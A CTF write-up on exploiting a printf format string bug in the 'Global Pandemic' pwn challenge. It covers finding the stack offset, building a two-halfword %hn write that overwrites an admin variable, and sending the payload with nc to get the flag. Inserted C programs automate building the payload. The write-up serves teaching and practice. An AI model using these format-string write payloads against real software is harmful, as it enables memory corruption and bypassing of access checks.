Capture The Talent — Pwn Write-up : Global Pandemic

The Capture The Talent CTF took place from Saturday, February 19 to Sunday, February 20, 2022. 🏆 Final ranking: 1/52

Here is a write-up of the Global Pandemic challenge from the Pwn category.

Thanks to egotistical for creating the challenges and managing the CTF!

Global Pandemic

This challenge gives us the C source code and the compiled binary.

Global_Pandemic.c

The Vulnerability

Looking at the C code, the first thing that stands out is the printf(pass); line: user input is passed to printf as the format string, with no format arguments.

That is a format string bug. We can confirm it by compiling the source with clang, which warns that the format string is not a string literal.

Compilation of the c code with clang.

Pre-requirements

To obtain the flag, we need to change the value of the admin variable. To do that, we have to write 0xb4dbabe3 at the address of admin.

A quick checksec tells us that the binary is compiled without PIE, so the address of the variable is the same on every run.

Running nm on the binary gives the address of the admin variable.

Address of admin variable.

Offset

Now we need to know at which positional index on the stack our input string sits, so that the write can be pointed at the addresses we place in it.

Offset of our input in stack.

As you can see above, indexes 12 and 13 hold 41414141 and 42424242, which are our AAAA and BBBB input respectively.
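As an added example (not part of the original write-up), here is the probing step automated in C: build_probe emits the marker string followed by a run of conversions, and find_offset reads the echoed reply back and reports the positional index of each marker. It assumes the probe is "AAAABBBB" followed by repeated "%08x." conversions, which is one common form; the write-up does not show the exact probe it sent. SAMPLE_REPLY is a constructed reply with the markers at positions 12 and 13, not output captured from the challenge.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Build the probe: the markers "AAAABBBB" followed by `count` "%08x."
 * conversions. Each %08x pops one 4-byte stack slot, so the slot that
 * echoes 41414141 is the positional index of our own input buffer. */
static int build_probe(char *out, size_t cap, int count)
{
    int n = snprintf(out, cap, "AAAABBBB");
    for (int i = 0; i < count && n >= 0 && (size_t)n < cap; i++)
        n += snprintf(out + n, cap - (size_t)n, "%%08x.");
    return n;
}

/* Parse the echoed reply: skip the literal markers, then count the
 * dot-separated hex words until `marker` appears. Returns the 1-based
 * positional index, or 0 if the marker is not found. */
static int find_offset(const char *reply, unsigned long marker)
{
    const char *p = strstr(reply, "AAAABBBB");
    if (p == NULL)
        return 0;
    p += 8;
    for (int index = 1; *p != '\0'; index++) {
        char *end;
        unsigned long v = strtoul(p, &end, 16);
        if (end == p)
            break;                 /* not a hex word: end of the dump */
        if (v == marker)
            return index;
        p = (*end == '.') ? end + 1 : end;
    }
    return 0;
}

/* Constructed reply (not real challenge output): eleven filler words, then
 * the two markers at positions 12 and 13, then a trailing program message. */
static const char SAMPLE_REPLY[] =
    "AAAABBBB00000080.f7fb5580.08049230.f7fb5000.ffffd0fc.00000001."
    "ffffd1a4.ffffd1ac.f7fe3d70.f7fb5000.0804925a.41414141.42424242."
    "Wrong password\n";

static char probe_buf[512];

int main(void)
{
    build_probe(probe_buf, sizeof probe_buf, 20);
    printf("probe: %s\n", probe_buf);
    printf("AAAA at index %d, BBBB at index %d\n",
           find_offset(SAMPLE_REPLY, 0x41414141UL),
           find_offset(SAMPLE_REPLY, 0x42424242UL));
    return 0;
}
```

The index that comes back is what goes into the `%N$hn` conversions later; because the two addresses in the final payload also take exactly 8 bytes, they land on the same two slots the markers did.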

Perfect, we have our offset, now we can create the payload.

Payload

We can build the payload in one of three ways:

  • [admin_address]%[value]c%[index]$n
  • [admin_address][admin_address+2]%[value]c%[index]$hn%[value]c%[index]$hn
  • [admin_address][admin_address+1][admin_address+2][admin_address+3]%[value]c%[index]$hhn%[value]c%[index]$hhn%[value]c%[index]$hhn%[value]c%[index]$hhn

I personally prefer $hn, which writes 2 bytes at a time. $hhn writes 1 byte but makes the payload very long, and $n writes 4 bytes at once but the number of characters that must be printed (up to 4 billion) is sometimes too large for the program to handle.

The address of admin is 0x0804c02c, so admin_address+2 is 0x0804c02e.

First, I need to write 0xabe3 at admin_address.

To compute the width, I subtract the number of bytes already printed from the value I need to write.

The two addresses, admin_address and admin_address+2, are 4 bytes each, so 8 bytes have already been printed.

So 0xabe3 - 8 = 44003 - 8 = 43995.

Our payload so far: \x2c\xc0\x04\x08\x2e\xc0\x04\x08%43995c%12$hn.

The addresses are written in little endian.

The end of the payload follows the same logic: we need to write 0xb4db at admin_address+2.

Again, I subtract the bytes already printed from this value.

0xb4db - 43995 - 8 = 46299 - 44003 = 2296

Now we have our full payload:

\x2c\xc0\x04\x08\x2e\xc0\x04\x08%43995c%12$hn%2296c%13$hn
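The arithmetic above as an added example, not code from the original write-up: plan_hn computes the two widths in general, writing whichever halfword is smaller first and wrapping by 0x10000 whenever the running character count has already passed the target (the write-up's values need neither, since 0xabe3 < 0xb4db); build_payload emits the same bytes as the final payload; and local_hn_write performs the two %hn writes against a local stand-in for admin, so the result can be checked without the remote service. The prefix stays at exactly 8 bytes because that is what put the two addresses on slots 12 and 13 during probing; a different prefix length shifts them. It assumes a little-endian host and a glibc-compatible printf.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values taken from the write-up: the wanted admin value and nm's address. */
#define ADMIN_WANT 0xb4dbabe3u
#define ADMIN_ADDR 0x0804c02cu

struct hn_plan {
    unsigned w1, w2;   /* widths of the two %c conversions */
    int lo_first;      /* 1: low halfword written first, 0: high halfword first */
};

/* Width that makes the running character count end on target16 (mod 0x10000).
 * C's % keeps the dividend's sign, hence the first fix-up; "%0c" still prints
 * one character, so a zero difference must become a full 0x10000 wrap. */
static unsigned pad_to(long *count, unsigned target16)
{
    long w = ((long)target16 - *count) % 0x10000;
    if (w < 0)
        w += 0x10000;
    if (w < 1)
        w += 0x10000;
    *count += w;
    return (unsigned)w;
}

/* prefix = bytes printed before the first %c (8: the two 4-byte addresses).
 * The smaller halfword goes first so the second width is a plain difference;
 * in the write-up 0xabe3 < 0xb4db, so the low halfword happens to come first. */
static struct hn_plan plan_hn(uint32_t value, long prefix)
{
    struct hn_plan p;
    unsigned lo = value & 0xffffu, hi = value >> 16;
    long count = prefix;
    p.lo_first = lo <= hi;
    p.w1 = pad_to(&count, p.lo_first ? lo : hi);
    p.w2 = pad_to(&count, p.lo_first ? hi : lo);
    return p;
}

static void put_le32(unsigned char *out, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[i] = (v >> (8 * i)) & 0xff;
}

/* Remote payload: [addr][addr+2] then %W1c%I1$hn%W2c%I2$hn. `index` is the
 * positional index of the first address (12 here); addr+2 sits at index+1.
 * Returns the payload length, or 0 if `out` is too small. */
static size_t build_payload(unsigned char *out, size_t cap,
                            uint32_t addr, uint32_t value, int index)
{
    struct hn_plan p = plan_hn(value, 8);
    if (cap < 8)
        return 0;
    put_le32(out, addr);
    put_le32(out + 4, addr + 2);
    int n = snprintf((char *)out + 8, cap - 8, "%%%uc%%%d$hn%%%uc%%%d$hn",
                     p.w1, p.lo_first ? index : index + 1,
                     p.w2, p.lo_first ? index + 1 : index);
    if (n < 0 || (size_t)n >= cap - 8)
        return 0;
    return 8 + (size_t)n;
}

/* 1 if build_payload reproduces the write-up's final payload byte for byte. */
static int payload_matches_writeup(void)
{
    static const char want[] =
        "\x2c\xc0\x04\x08\x2e\xc0\x04\x08%43995c%12$hn%2296c%13$hn";
    unsigned char got[128];
    size_t n = build_payload(got, sizeof got, ADMIN_ADDR, ADMIN_WANT, 12);
    return n == sizeof want - 1 && memcmp(got, want, n) == 0;
}

/* The same two writes performed locally against a stand-in for `admin`, with
 * the halfword pointers passed directly instead of via stack indexes. %*c
 * takes its width from the argument list, so the format stays a literal.
 * Assumes a little-endian host, like the x86 target. */
static uint32_t local_hn_write(uint32_t value)
{
    static char sink[0x20000 + 16];   /* room for the longest possible padding */
    union { uint32_t word; short half[2]; } admin = { 0 };
    struct hn_plan p = plan_hn(value, 8);
    short *first = p.lo_first ? &admin.half[0] : &admin.half[1];
    short *second = p.lo_first ? &admin.half[1] : &admin.half[0];

    snprintf(sink, sizeof sink, "AAAAAAAA%*c%hn%*c%hn",
             (int)p.w1, 'A', first, (int)p.w2, 'A', second);
    return admin.word;
}

int main(void)
{
    unsigned char buf[128];
    size_t n = build_payload(buf, sizeof buf, ADMIN_ADDR, ADMIN_WANT, 12);
    fwrite(buf, 1, n, stdout);           /* pipe into nc, as in the write-up */
    fprintf(stderr, "local check: admin = 0x%08x\n",
            (unsigned)local_hn_write(ADMIN_WANT));
    return 0;
}
```

Piping the program's stdout into nc reproduces the one-liner below. Two checks worth keeping in mind when reusing this: a target address containing a 0x00 byte would truncate the input if the program reads it as a C string, and when the second halfword is smaller than the first the plain subtraction goes negative, which is exactly the case pad_to handles by adding 0x10000.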

We can send it to the challenge to get the flag.

$ python -c "print('\x2c\xc0\x04\x08\x2e\xc0\x04\x08%43995c%12\$hn%2296c%13\$hn')" | nc 18.134.175.139 5555
[snip]
CTT{H0p3_y0u_h4d_fun_w1th_7h1s_1_XD}

Flag: CTT{H0p3_y0u_h4d_fun_w1th_7h1s_1_XD}

Les Pires Hat, French CTF team
